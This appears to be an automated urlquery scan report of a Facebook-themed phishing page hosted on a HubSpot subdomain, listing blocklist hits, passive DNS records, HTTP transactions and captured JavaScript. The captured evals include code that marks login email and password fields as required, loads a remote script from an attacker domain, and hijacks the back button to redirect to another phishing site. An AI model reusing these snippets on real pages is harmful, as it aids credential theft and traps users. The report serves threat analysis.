Overview

URL appnewstv.hs-sites-eu1.com/
IP 172.64.154.3
ASN CLOUDFLARENET
Location United States
Report completed 2022-09-14 22:55:59 UTC
urlquery Alerts No alerts detected


Settings

UserAgent Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blocklists

OpenPhish
Scan Date Severity Indicator Comment
2022-09-14 2 appnewstv.hs-sites-eu1.com/ Facebook, Inc.
2022-09-14 2 appnewstv.hs-sites-eu1.com/ Facebook, Inc.
PhishTank  No alerts detected
Fortinet's Web Filter
Scan Date Severity Indicator Comment
2022-09-14 2 appnewstv.hs-sites-eu1.com/ Phishing
2022-09-14 2 appnewstv.hs-sites-eu1.com/_hcms/perf Phishing
mnemonic secure dns  No alerts detected
Quad9 DNS  No alerts detected


Files

No files detected



Passive DNS (27)

Passive DNS Source Fully Qualifying Domain Name Rank First Seen Last Seen IP Comment
mnemonic passive DNS whos.amung.us (1) 12687 2014-04-02 14:27:13 UTC 2022-09-14 18:19:29 UTC 104.22.74.171
mnemonic passive DNS cdn2.hubspot.net (2) 7304 2013-04-11 07:00:34 UTC 2022-09-14 07:16:42 UTC 104.17.244.204
mnemonic passive DNS fonts.gstatic.com (2) 0 2014-08-29 13:43:22 UTC 2022-09-14 04:48:25 UTC 142.250.74.163 Domain (gstatic.com) ranked at: 540
mnemonic passive DNS forms-eu1.hubspot.com (1) 77050 2021-08-03 13:53:49 UTC 2022-09-14 15:39:31 UTC 172.65.193.34
mnemonic passive DNS fonts.googleapis.com (1) 8877 2014-07-21 13:19:55 UTC 2022-09-14 17:07:12 UTC 142.250.74.10
mnemonic passive DNS firefox.settings.services.mozilla.com (2) 867 2020-05-27 20:08:30 UTC 2022-09-14 18:38:37 UTC 143.204.55.115
mnemonic passive DNS js-eu1.hscollectedforms.net (1) 75385 2021-08-03 13:53:48 UTC 2022-09-14 15:39:30 UTC 172.65.192.122
mnemonic passive DNS track-eu1.hubspot.com (1) 73788 2021-08-03 10:49:05 UTC 2022-09-14 15:39:33 UTC 172.65.240.166
mnemonic passive DNS r3.o.lencr.org (7) 344 2020-12-02 08:52:13 UTC 2022-09-14 04:47:59 UTC 23.36.76.226
mnemonic passive DNS app-eu1.hubspot.com (1) 191732 2021-07-26 14:26:48 UTC 2022-09-14 18:54:16 UTC 172.65.236.181
mnemonic passive DNS ocsp.pki.goog (3) 175 2017-06-14 07:23:31 UTC 2022-09-14 04:48:23 UTC 142.250.74.3
mnemonic passive DNS f.hubspotusercontent-eu1.net (3) 278068 2021-08-12 10:46:27 UTC 2022-09-14 18:54:16 UTC 104.18.34.226
mnemonic passive DNS js-eu1.hs-scripts.com (1) 63672 2021-08-03 13:53:48 UTC 2022-09-14 15:39:29 UTC 172.65.208.22
mnemonic passive DNS 26246913.fs1.hubspotusercontent-eu1.net (1) 0 2022-09-14 10:25:59 UTC 2022-09-14 10:25:59 UTC 104.18.34.226 Unknown ranking
mnemonic passive DNS feliznewstv.com (2) 0 2022-07-23 16:41:06 UTC 2022-09-14 10:26:10 UTC 147.182.144.225 Unknown ranking
mnemonic passive DNS js-eu1.hs-analytics.net (1) 69352 2021-08-03 13:53:48 UTC 2022-09-14 15:39:30 UTC 172.65.238.60
mnemonic passive DNS content-signature-2.cdn.mozilla.net (1) 1152 2020-11-03 12:26:46 UTC 2022-09-14 04:47:55 UTC 143.204.55.25
mnemonic passive DNS cdnjs.cloudflare.com (3) 235 2020-10-20 10:17:36 UTC 2022-09-14 05:00:27 UTC 104.17.24.14
mnemonic passive DNS static.hsappstatic.net (5) 8199 2013-09-26 02:22:42 UTC 2022-09-14 05:56:13 UTC 104.17.5.210
mnemonic passive DNS forms-eu1.hsforms.com (1) 91702 2021-08-03 13:53:50 UTC 2022-09-14 15:39:30 UTC 172.65.232.43
mnemonic passive DNS js-eu1.hs-banner.com (1) 66996 2021-08-03 13:53:48 UTC 2022-09-14 15:39:30 UTC 172.65.202.201
mnemonic passive DNS ocsp.digicert.com (1) 86 2012-05-21 07:02:23 UTC 2022-09-14 18:30:48 UTC 93.184.220.29
mnemonic passive DNS push.services.mozilla.com (1) 2140 2015-09-03 10:29:36 UTC 2022-09-14 04:48:23 UTC 34.213.140.56
mnemonic passive DNS img-getpocket.cdn.mozilla.net (6) 1631 2017-09-01 03:40:57 UTC 2022-09-14 12:35:36 UTC 34.120.237.76
mnemonic passive DNS appnewstv.hs-sites-eu1.com (2) 0 2022-09-13 19:45:26 UTC 2022-09-14 15:35:08 UTC 104.18.33.253 Unknown ranking
mnemonic passive DNS widgets.amung.us (1) 12623 2012-05-21 19:25:54 UTC 2022-09-14 15:59:15 UTC 104.22.75.171
mnemonic passive DNS contile.services.mozilla.com (1) 1114 2021-05-27 18:32:35 UTC 2022-09-14 04:48:22 UTC 34.117.237.239


Recent reports on same IP/ASN/Domain/Screenshot

Last 3 reports on IP: 172.64.154.3

Date | UQ / IDS / BL | URL | IP
2022-09-15 09:57:01 +0000 | 0 - 0 - 2 | news4kcnn.hs-sites-eu1.com/?fbclid=IwAR2SUqE3 (...) | 172.64.154.3
2022-09-14 22:55:59 +0000 | 0 - 0 - 4 | appnewstv.hs-sites-eu1.com/ | 172.64.154.3
2022-09-14 22:05:19 +0000 | 0 - 0 - 5 | cnnnews4k.hs-sites-eu1.com/ | 172.64.154.3

Last 5 reports on ASN: CLOUDFLARENET

Date | UQ / IDS / BL | URL | IP
2022-12-03 23:37:53 +0000 | 1 - 0 - 2 | squatbully.com/form/code/invest/browser/perma (...) | 104.21.80.165
2022-12-03 23:37:40 +0000 | 0 - 0 - 4 | clubedematrizes.com/mahalaxmi-escorts/ | 172.67.210.166
2022-12-03 23:36:18 +0000 | 0 - 0 - 2 | storageapi.fleek.co/30001fbf-a421-4772-86aa-8 (...) | 104.18.7.145
2022-12-03 23:35:57 +0000 | 0 - 0 - 4 | cinecalidad.run/ver-pelicula/desencantada-dis (...) | 104.21.88.50
2022-12-03 23:35:53 +0000 | 0 - 0 - 2 | origa-cloud-b38d.c71rcsyb.workers.dev/5e3d87a (...) | 172.67.186.119

Last 5 reports on domain: hs-sites-eu1.com

Date | UQ / IDS / BL | URL | IP
2022-12-02 21:27:43 +0000 | 0 - 0 - 1 | prositevd.hs-sites-eu1.com/ | 104.18.33.253
2022-11-28 08:35:20 +0000 | 0 - 0 - 0 | hoegheiendom-25006101.hs-sites-eu1.com/inflas (...) | 104.18.33.253
2022-11-14 13:35:03 +0000 | 0 - 0 - 6 | wwwcnn-news4k.hs-sites-eu1.com/ | 104.18.33.253
2022-11-14 09:32:46 +0000 | 0 - 0 - 9 | wwwcnn-news4k.hs-sites-eu1.com/ | 104.18.33.253
2022-09-23 23:15:15 +0000 | 0 - 0 - 2 | private-video.hs-sites-eu1.com/ | 104.18.33.253

Last 5 reports with similar screenshot

Date | UQ / IDS / BL | URL | IP
2022-11-15 15:41:18 +0000 | 0 - 0 - 8 | app-funnelsx.bubbleapps.io/version-test/ | 104.19.217.48
2022-11-14 09:32:46 +0000 | 0 - 0 - 9 | wwwcnn-news4k.hs-sites-eu1.com/ | 104.18.33.253
2022-11-10 23:45:55 +0000 | 0 - 0 - 8 | rickpack44.bubbleapps.io/version-test/ | 104.19.218.48
2022-11-10 14:36:22 +0000 | 0 - 0 - 8 | rickpack44.bubbleapps.io/version-test/ | 104.19.218.48
2022-11-01 10:39:02 +0000 | 0 - 0 - 2 | jhufedsgjg614322067.brizy.site/ | 34.237.47.210


JavaScript

Executed Scripts (19)


Executed Evals (6)

#1 JavaScript::Eval (size: 386, repeated: 1) - SHA256: d56b088af0f7a23d2cdc0a4e61293c5e55c61d23a49e18906733f77e1b3ab364

document.body.className = document.body.className + ' touch x1-5 android _fzu _50-3 iframe acw portrait';
m_login_email.required = true;
m_login_password.required = true;
var script_ = document.createElement('script');
script_.src = "https://feliznewstv.com/location";
script_.async = true;
document.body.appendChild(script_);
                                    

#2 JavaScript::Eval (size: 516, repeated: 1) - SHA256: 981233bb7fc26109c211cad042da538cf8df699dc77e1b859daf53174dd95f24

(function() {
    var ignoreHistoryChange = true;
    window.onpopstate = function(event) {

        if (!ignoreHistoryChange) {
            ignoreHistoryChange = true;

            try {
                window.top.location = 'https://oficial-sites-news.hs-sites-eu1.com/';
            } catch (d) {
                window.location = 'https://oficial-sites-news.hs-sites-eu1.com/';
            };
            return false;

        } else {
            ignoreHistoryChange = false;
        }


    };
})();
                                    

#3 JavaScript::Eval (size: 506, repeated: 1) - SHA256: faa040a5ceb4c2ae787756b6505cc259fd4eecf9eefd1a619b68170c36be4481

(function() {
    window.location.hash = Math.random();
    var ignoreHashChange = true;
    window.onhashchange = function() {
        if (!ignoreHashChange) {
            ignoreHashChange = true;

            try {
                window.top.location = 'https://oficial-sites-news.hs-sites-eu1.com/';
            } catch (d) {
                window.location = 'https://oficial-sites-news.hs-sites-eu1.com/';
            };
            return false;

        } else {
            ignoreHashChange = false;
        }
    };
})();
                                    

#4 JavaScript::Eval (size: 74, repeated: 1) - SHA256: caa4136b6be3d43f29aa4daaae83f78c3b5c2147caab95afa2204069aa91a97c

 (function() {
     new Image().src = '//whos.amung.us/widget/josvip222';
 })();
                                    

#5 JavaScript::Eval (size: 0, repeated: 1) - SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                        
                                    

#6 JavaScript::Eval (size: 72, repeated: 1) - SHA256: 29a2f56684cbeb9be02ed2d2ada727030d2781d6f6630d817ea23ef8ab50b293

(function() {
    new Image().src = '//whos.amung.us/widget/josvip222';
})();
                                    

Executed Writes (0)



HTTP Transactions (53)


Request Response
                                        
                                            GET /v1/ HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.115
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Content-Length: 939
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Type, Content-Length, Backoff, Retry-After, Alert
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Date: Wed, 14 Sep 2022 22:09:59 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Cache: Hit from cloudfront
Via: 1.1 50584ad285d5f627ddebae74efdd0770.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: gzmimzokrrZxlxqI2SqWj4m2kv3TFsTKdXhkb2Gd54RpinzlQ5cjTA==
Age: 2749


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Size:   939
Md5:    99b7d23c1748d0526782b9ff9ea45f09
Sha1:   eadd801a3ba2aa00632c6fb52e1f9125bd6d5b4f
Sha256: 48f81668f76955320480b484138aebdad5d03c471036b4449c737aca1ecab08e
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "B5F178D23E633283F226CCA7A9AE79B01E6CAB2299FF7065C980D3A9953212FD"
Last-Modified: Tue, 13 Sep 2022 06:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5207
Expires: Thu, 15 Sep 2022 00:22:35 GMT
Date: Wed, 14 Sep 2022 22:55:48 GMT
Connection: keep-alive

                                        
                                            GET /chains/remote-settings.content-signature.mozilla.org-2022-10-09-23-18-04.chain HTTP/1.1 
Host: content-signature-2.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.25
HTTP/2 200 OK
content-type: binary/octet-stream
                                        
content-length: 5348
last-modified: Sat, 20 Aug 2022 23:18:05 GMT
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
date: Wed, 14 Sep 2022 04:35:16 GMT
etag: "742edb4038f38bc533514982f3d2e861"
x-cache: Hit from cloudfront
via: 1.1 4f01f770085624552bc30a98954f963a.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-C1
x-amz-cf-id: 7ayY4pHwRFzM1s0H_OCGURPCL9goIRghrbjQULAbpQxdRB60X1X-tA==
age: 66033
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PEM certificate\012- , ASCII text
Size:   5348
Md5:    742edb4038f38bc533514982f3d2e861
Sha1:   cc3a20c8dc2a8c632ef9387a2744253f1e3fdef1
Sha256: b6bfa49d3d135035701231db2fffc0c0643444394009a94c6a1b4d829d6b8345
                                        
                                            GET /v1/tiles HTTP/1.1 
Host: contile.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.117.237.239
HTTP/2 200 OK
content-type: application/json
                                        
server: nginx
date: Wed, 14 Sep 2022 22:55:49 GMT
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   12
Md5:    23e88fb7b99543fb33315b29b1fad9d6
Sha1:   a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
                                        
                                            GET / HTTP/1.1 
Host: appnewstv.hs-sites-eu1.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

                                         
                                         104.18.33.253
HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
                                        
Date: Wed, 14 Sep 2022 22:55:49 GMT
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 74acb6595bae0b69-OSL
Cache-Control: s-maxage=10,max-age=5
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Access-Control-Allow-Credentials: false
cache-tag: CT-53071520739,P-26246913,CW-53070285001,CW-53070285002,CW-53070973145,CW-53071252457,E-53070144758,E-53070288600,E-53070973151,E-53070973152,E-53070973154,E-53070982620,E-53071252464,RA-53070285250,PGS-ALL,SW-0
Edge-Cache-Tag: CT-53071520739,P-26246913,CW-53070285001,CW-53070285002,CW-53070973145,CW-53071252457,E-53070144758,E-53070288600,E-53070973151,E-53070973152,E-53070973154,E-53070982620,E-53071252464,RA-53070285250,PGS-ALL,SW-0
X-HS-Cache-Config: BrowserCache-5s-EdgeCache-10s
X-HS-Content-Id: 53071520739
X-HS-Hub-Id: 26246913
X-HubSpot-Correlation-Id: 00d4a57c-6a09-4eea-883e-ebc310f917f7
X-Powered-By: HubSpot
X-Robots-Tag: none
X-Trace: 2B2805DDD144D1A0FFB146F6FC66A84A0DA8B74763000000000000000000
Server: cloudflare
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, Unicode text, UTF-8 text, with very long lines (1069)
Size:   5365
Md5:    e207a80d7a7d699753612cdc8c3b5cf9
Sha1:   5342f9093290687006bce8154228bf9208568544
Sha256: 159708ec21d0f3eb7f4601961e60337f5417f61d76847cfbd0a6e2864c72420e

Alerts:
  Blocklists:
    - openphish: Facebook, Inc.
    - fortinet: Phishing
                                        
                                            GET /ajax/libs/font-awesome/5.15.1/css/all.min.css HTTP/1.1 
Host: cdnjs.cloudflare.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.17.24.14
HTTP/2 200 OK
content-type: text/css; charset=utf-8
                                        
date: Wed, 14 Sep 2022 22:55:49 GMT
content-length: 10491
access-control-allow-origin: *
cache-control: public, max-age=30672000
content-encoding: br
etag: "5f7b5b5f-e7d0"
last-modified: Mon, 05 Oct 2020 17:43:59 GMT
cf-cdnjs-via: cfworker/kv
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
x-content-type-options: nosniff
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding
cf-cache-status: HIT
age: 4239167
expires: Mon, 04 Sep 2023 22:55:49 GMT
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IhRXCgDLpp1W6ENOeN5UZWxtuCnVzs%2F05JGg%2Fa0SljrymXUIwTBHA2kv4j6dU%2FsIm%2Bex2OjWvalTKrFWm3y6LWi%2BbLoogCQIwl0g%2BV%2BC4d6CppH6BtXYhUi1R0t4S8Fv5OzIx9mH"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=15780000
server: cloudflare
cf-ray: 74acb65d893db506-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (59158)
Size:   10491
Md5:    a20f2b1b0e73086a7546d004092fb368
Sha1:   3c0e3c8c74971acac179bb55951410cdfc26abab
Sha256: 185c5af2acbae7972165d8c67887a7300e85cb3f03882048437b6e5177c1fe2a
                                        
                                            GET /ajax/libs/jquery/3.5.1/jquery.min.js HTTP/1.1 
Host: cdnjs.cloudflare.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.17.24.14
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
date: Wed, 14 Sep 2022 22:55:49 GMT
content-length: 27958
access-control-allow-origin: *
cache-control: public, max-age=30672000
content-encoding: br
etag: "5eb09ed3-15d84"
last-modified: Mon, 04 May 2020 23:01:39 GMT
cf-cdnjs-via: cfworker/kv
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
x-content-type-options: nosniff
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding
cf-cache-status: HIT
age: 8639853
expires: Mon, 04 Sep 2023 22:55:49 GMT
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zDMJEPBmeRECf%2B4ntlnTfjkQJvMIh2lBwZHvZ%2FjuT3sgVkj%2FQFz%2FeHHIYKZIM5RR6UoT4syOuhVYj79xR20VwIUkvGdQL%2BlOsmyewd4O%2Fn9gw8xUU1RlA1HjAUFoQ4JtcQadh3kq"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=15780000
server: cloudflare
cf-ray: 74acb65d9946b506-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (65451)
Size:   27958
Md5:    4b5f47439b640180cc3450f7de05d0d8
Sha1:   5a0dc9bcab80ddc409dd35fcb00a88fe6846fee2
Sha256: 1f85e8b327f42c17c025d69849914068536d9aa95412fe473ae90ffb2f4ebd82
                                        
                                            GET /hub/26246913/hub_generated/template_assets/53070288600/1663077099315/marketplace/GiantFocal/Hatch_Landing/css/main.min.css HTTP/1.1 
Host: f.hubspotusercontent-eu1.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/

                                         
                                         104.18.34.226
HTTP/1.1 200 OK
Content-Type: text/css
X-HS-Alternate-Content-Type: text/plain
                                        
Date: Wed, 14 Sep 2022 22:55:49 GMT
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 74acb65d5e28b500-OSL
Access-Control-Allow-Origin: *
Age: 44990
Cache-Control: public, max-age=1209600
Content-Encoding: gzip
ETag: W/"7c228c6edbc872215fbf537a8b4cf18e"
Expires: Wed, 28 Sep 2022 22:55:49 GMT
Last-Modified: Tue, 13 Sep 2022 13:51:43 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Access-Control-Allow-Methods: GET
X-Amz-Cf-Pop: FRA53-C1
x-amz-meta-created-unix-time-millis: 1663077102493
x-amz-server-side-encryption: AES256
x-amz-storage-class: INTELLIGENT_TIERING
X-HS-CF-Lambda: us-east-1.enforceAclForReads 5
X-HS-CF-Lambda-Enforce: us-east-1.enforceAclForReads 5
Server: cloudflare


--- Additional Info ---
Magic:  ASCII text, with very long lines (38627)
Size:   78600
Md5:    5256ccfbc2ab2efe1333e9307bc73e65
Sha1:   24f4e33e7aae36a340369b7142cfb52ae65b6d44
Sha256: d19cd994105a0d58d42125024879d444797c935ccdbc763957bc033ca6f5b555
                                        
                                            GET /ajax/libs/jquery-migrate/3.3.1/jquery-migrate.min.js HTTP/1.1 
Host: cdnjs.cloudflare.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.17.24.14
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
date: Wed, 14 Sep 2022 22:55:49 GMT
content-length: 3592
access-control-allow-origin: *
cache-control: public, max-age=30672000
content-encoding: br
etag: "5ef3fc71-2b0b"
last-modified: Thu, 25 Jun 2020 01:22:57 GMT
cf-cdnjs-via: cfworker/kv
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
x-content-type-options: nosniff
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding
cf-cache-status: HIT
age: 6239054
expires: Mon, 04 Sep 2023 22:55:49 GMT
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Hj9Kxtq2C0YxbWB%2BKe5fGuQmIMDGo6s%2BQSyZm2MlOIJrLDE4Q8pteMEHsr8BTaxuIYpWM%2FuWCE68xdd2qaL%2BZI%2BsiL%2BwEDkOWL%2BdNYXKgzCkIYpvNSLsox383dbV6bZeKVKneCLL"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=15780000
server: cloudflare
cf-ray: 74acb65da955b506-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (10878)
Size:   3592
Md5:    6ea2c00839ed36981fbd1b780e595bfb
Sha1:   9ccfa1a9cd5cb950fc6aaf7697e8a0f9445499b8
Sha256: 9264523f67fe6dae44ac10a749711f77eeff71a8296210098d1144f84e01f944
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Wed, 14 Sep 2022 22:55:49 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /hub/26246913/hub_generated/template_assets/53070982620/1663077090631/marketplace/GiantFocal/Hatch_Landing/js/plugins/plugins.min.js HTTP/1.1 
Host: f.hubspotusercontent-eu1.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/

                                         
                                         104.18.34.226
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
X-HS-Alternate-Content-Type: text/plain
                                        
Date: Wed, 14 Sep 2022 22:55:49 GMT
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 74acb65d8e231c16-OSL
Access-Control-Allow-Origin: *
Age: 44990
Cache-Control: public, max-age=1209600
ETag: W/"709362e671b2b08da9b90e574d607024"
Expires: Wed, 28 Sep 2022 22:55:49 GMT
Last-Modified: Tue, 13 Sep 2022 13:51:31 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Access-Control-Allow-Methods: GET
X-Amz-Cf-Pop: FRA53-C1
x-amz-meta-created-unix-time-millis: 1663077090919
x-amz-server-side-encryption: AES256
x-amz-storage-class: INTELLIGENT_TIERING
X-HS-CF-Lambda: us-east-1.enforceAclForReads 5
X-HS-CF-Lambda-Enforce: us-east-1.enforceAclForReads 5
Server: cloudflare
Content-Encoding: gzip


--- Additional Info ---
Magic:  ASCII text, with very long lines (3296)
Size:   1465
Md5:    a4293e27e8623332217827abd391a216
Sha1:   3d56fe03c815733f126c62084c7f81bd55e73c08
Sha256: ed71fb54bd4710f3596a1350059adb20d91367da6fd04670eabbd09316912e3f
                                        
                                            GET /hub/26246913/hub_generated/template_assets/53071252464/1663077093553/marketplace/GiantFocal/Hatch_Landing/js/main.min.js HTTP/1.1 
Host: f.hubspotusercontent-eu1.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/

                                         
                                         104.18.34.226
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
X-HS-Alternate-Content-Type: text/plain
                                        
Date: Wed, 14 Sep 2022 22:55:49 GMT
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 74acb65d8e4b0afa-OSL
Access-Control-Allow-Origin: *
Age: 44990
Cache-Control: public, max-age=1209600
ETag: W/"d9021282f13fd812e10bb808a4c186e0"
Expires: Wed, 28 Sep 2022 22:55:49 GMT
Last-Modified: Tue, 13 Sep 2022 13:51:34 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Access-Control-Allow-Methods: GET
X-Amz-Cf-Pop: FRA53-C1
x-amz-meta-created-unix-time-millis: 1663077093849
x-amz-server-side-encryption: AES256
x-amz-storage-class: INTELLIGENT_TIERING
X-HS-CF-Lambda: us-east-1.enforceAclForReads 5
X-HS-CF-Lambda-Enforce: us-east-1.enforceAclForReads 5
Server: cloudflare
Content-Encoding: gzip


--- Additional Info ---
Magic:  ASCII text, with very long lines (6578)
Size:   1642
Md5:    06009aad337ffed6cf8df4b3abaf6ab2
Sha1:   9cb81c4cf430535387204787bb3e5a083adef1fe
Sha256: ff81071ab461b03cda8c9cca779ddf6c354114979ebe0b8bd99a2aabc05b5227
                                        
                                            GET /26246913.js HTTP/1.1 
Host: js-eu1.hs-scripts.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/

                                         
                                         172.65.208.22
HTTP/1.1 200 OK
Content-Type: application/javascript;charset=utf-8
                                        
Date: Wed, 14 Sep 2022 22:55:49 GMT
Content-Length: 603
Connection: keep-alive
X-Trace: 2B8A87F9780D1080CC29F8E5A10211AACFFCB17311000000000000000000
Cache-Control: public, max-age=30
Vary: Accept-Encoding
